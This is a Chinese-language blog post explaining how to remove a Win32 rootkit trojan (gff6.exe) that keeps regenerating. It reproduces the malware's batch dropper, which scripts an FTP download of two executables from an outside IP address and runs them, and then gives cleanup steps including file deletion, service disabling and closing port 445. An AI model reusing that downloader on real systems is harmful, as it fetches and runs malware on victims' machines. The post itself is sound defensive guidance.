360报c:\windows\system32\gff6.exe为Win32/RootKit木马,虽经反复查杀删除文件仍然会重新生成,导致杀毒软件多次发出警报。gff6.exe可能由一个批处理文件C:\WINDOWS\system32\g45g.bat生成,其内容为:
echo open 218.25.54.221 2689 > ncc
echo 123>> ncc
echo 123>> ncc
echo bin >> ncc
echo get dfc3.exe >> ncc
echo get gff6.exe >> ncc
echo bye >> ncc
ftp -s:ncc
del ncc
start dfc3.exe
start gff6.exe
del /F /Q g45g.bat
当然可能变种会改变批处理文件名与其中部分内容,如生成木马文件名,该木马可能导致的问题是间歇断网。建议的清除方法如下:
1.删除以下文件:
C:\WINDOWS\system32\g45g.bat
C:\WINDOWS\SYSTEM32\DFC3.EXE(可能文件名会有不同,按批处理文件中的名字查找)
C:\WINDOWS\SYSTEM32\GFF6.EXE(同上)
C:\WINDOWS\system\csrss.exe
2.使用SREng修复下面各项:
启动项目 -- 服务 -- Win32服务应用程序之如下项禁用:
[Remote Network Connections to Manage / NrConnmags] <"C:\WINDOWS\system\csrss.exe">
3.将C:\WINDOWS\system32\drivers\tcpip.sys用同系统的正常文件替换。
4.关闭本机的445端口,防止病毒利用其进行攻击(重复生成gff6.exe):
使用注册表关闭445端口的方法:打开注册表,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters,在窗口右边空白处点击鼠标右键,新建DWORD值,将新建的DWORD参数命名为“SMBDeviceEnabled”,数值为缺省的“0”。
以上方法是从网络上收集整理综合的。
>> 除非说明均为原创,如转载请注明来源于http://www.stormcn.cn/post/766.html
